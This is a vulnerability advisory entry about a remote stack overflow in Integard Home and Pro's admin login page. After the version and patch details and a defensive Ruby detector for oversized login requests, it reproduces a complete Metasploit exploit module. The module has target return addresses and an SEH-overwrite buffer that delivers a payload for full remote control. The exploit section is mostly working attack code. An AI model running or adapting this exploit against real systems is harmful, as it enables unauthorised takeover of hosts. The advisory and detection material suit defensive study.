Integard Home and Pro HTTP Request Remote Stack Overflow Vulnerability

2010-09-09T00:00:00
ID SSV:20107
Type seebug
Reporter Root
Modified 2010-09-09T00:00:00

Description

Integard Home and Integard Pro are web content monitoring and filtering systems for home and enterprise use, respectively.

The administration page served on port 18881 of the Integard server contains a stack overflow vulnerability. A remote attacker can trigger the overflow by supplying an overlong string in the password field, resulting in complete control of the application and the operating system.

Affected versions:

Race River Integard Home 2.0.0.9021
Race River Integard Pro 2.2.0.9026

Vendor patch:

Race River

The vendor has already released upgrade patches that fix this security issue; please download them from the vendor's home page:

http://www.integard.com.au/Release_Notes_Home.htm
http://www.integard.com.au/Release_Notes_Pro.htm
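The request shape this advisory describes is easy to recognise on the wire: a POST to the admin login path whose Password field is thousands of bytes long, and (in the module reproduced below) a declared Content-Length of 1074 that does not match the roughly 3 KB body actually sent. The following detector is an added example for a proxy or IDS-style check in front of port 18881; it is not part of the Seebug record or of the Metasploit module. The path /LoginAdmin and the Password parameter name are taken from the module, the 512-byte password threshold is an assumption, and the sample requests are constructed, not captured traffic. Malformed percent-encoding in the body is kept as raw bytes rather than dropped, so an oversized field is still measured.

```ruby
# Added example (not from the advisory or the Metasploit module): flag login
# requests to the Integard admin port that match the overflow pattern.
require 'uri'

# Assumption: no legitimate admin password approaches this size, while the
# overflow described in the advisory needs a field of about 3 KB.
MAX_PASSWORD_LEN = 512
LOGIN_PATH = '/LoginAdmin'   # login path used by the exploit module below

# Split a raw HTTP request into [method, path, headers, body].
# Header names are lower-cased so lookups are case-insensitive.
def parse_http_request(raw)
  head, body = raw.split("\r\n\r\n", 2)
  body ||= ''
  lines = head.split("\r\n")
  method, path, _version = lines.shift.to_s.split(' ', 3)
  headers = {}
  lines.each do |line|
    name, value = line.split(':', 2)
    next if value.nil?
    headers[name.strip.downcase] = value.strip
  end
  [method, path, headers, body]
end

# Decode one form component; on malformed %-encoding (which exploit buffers
# routinely contain) keep the raw bytes so their length is still counted.
def safe_decode(str)
  URI.decode_www_form_component(str)
rescue ArgumentError
  str
end

# Parse an application/x-www-form-urlencoded body into a hash.
def parse_form(body)
  params = {}
  body.split('&').each do |pair|
    key, value = pair.split('=', 2)
    next if key.nil? || key.empty?
    params[safe_decode(key)] = safe_decode(value.to_s)
  end
  params
end

# Return a list of findings for one raw request; empty means nothing suspicious.
def inspect_login_request(raw)
  findings = []
  method, path, headers, body = parse_http_request(raw)
  return findings unless method == 'POST' && path == LOGIN_PATH

  declared = headers['content-length']
  if declared && declared.to_i != body.bytesize
    findings << "content-length mismatch (declared #{declared}, got #{body.bytesize})"
  end

  password = parse_form(body)['Password'].to_s
  if password.bytesize > MAX_PASSWORD_LEN
    findings << "oversized Password field (#{password.bytesize} bytes)"
  end
  findings
end

# Constructed sample request in the form the login page expects; the declared
# Content-Length can be overridden to reproduce the mismatch seen in the module.
def sample_request(password, declared_length = nil)
  body = "Password=#{password}&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
  declared_length ||= body.bytesize
  "POST #{LOGIN_PATH} HTTP/1.1\r\nHost: 10.0.0.5:18881\r\n" \
    "Content-Length: #{declared_length}\r\n\r\n" + body
end

if __FILE__ == $PROGRAM_NAME
  puts inspect_login_request(sample_request('s3cret')).inspect            # benign login
  puts inspect_login_request(sample_request('A' * 3100, 1074)).inspect   # overflow-sized field
end
```

Both signals are worth keeping: the length check alone catches the overflow, while the Content-Length mismatch is cheap to evaluate on any request and also trips on tooling that hard-codes the header, as the module below does.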

class Metasploit3 < Msf::Exploit::Remote
 
    include Msf::Exploit::Remote::Tcp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Integard Home/Pro version 2.0',
            'Description'    => %q{
                    Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
            },
            'Author'  =>
                [
                    'Lincoln',
                    'Nullthreat',
                    'rick2600',
                ],
            'License'       => MSF_LICENSE,
            'Version'       => '$Revision: $',
            'References'    =>
                [
                    ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            'Payload'        =>
                {
                    'Space'    => 2000,
                    'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Privileged'     => false,
            'Targets'        =>
                [
                    [ 'Automatic Targeting',          { 'auto' => true }],
                    [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
                    [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
                ],
            'DefaultTarget'  => 0))
 
        register_options(
            [
                Opt::RPORT(18881)
            ], self.class )
    end
 
    # The current version does not work with bind() type payloads;
    # meterpreter, windows/exec etc. work fine.
 
    def exploit
        mytarget = target
        if(target['auto'])
            mytarget = nil
            print_status("[*] Automatically detecting the target...")
            connect
            # Fingerprint the build by the Content-Length of the static banner image
            get = "GET /banner.jpg HTTP/1.1\r\n\r\n"
            sock.put(get)
            data = sock.recv(1024)
            if (data =~ /Content-Length: 24584/)
                print_status("[!] Found Version - Integard Home")
                mytarget = self.targets[1]
            end
            if (data =~ /Content-Length: 23196/)
                print_status("[!] Found Version - Integard Pro")
                mytarget = self.targets[2]
            end
            sock.close
            # Neither fingerprint matched: stop instead of dereferencing nil below
            if mytarget.nil?
                print_error("[-] Could not identify the target version, aborting")
                return
            end
        end
        connect
        print_status("[!] Selected Target: #{mytarget.name}")
        print_status("[*] Building Buffer")
        pay = payload.encoded
        junk = rand_text_alpha_upper(3091 - pay.length)
        jmp = "\xE9\x2B\xF8\xFF\xFF"
        nseh = "\xEB\xF9\x90\x90"
        seh = [mytarget.ret].pack('V')
        buffer = junk + pay + jmp + nseh + seh
        print_status("[*] Sending Request")
        req = "POST /LoginAdmin HTTP/1.1\r\n"
        req << "Host: #{rhost}:#{rport}\r\n"   # use the configured target rather than a hard-coded lab address
        req << "Content-Length: 1074\r\n\r\n"
        req << "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
        sock.put(req)
        print_status("[*] Request Sent")
        sock.close
        handler
    end
end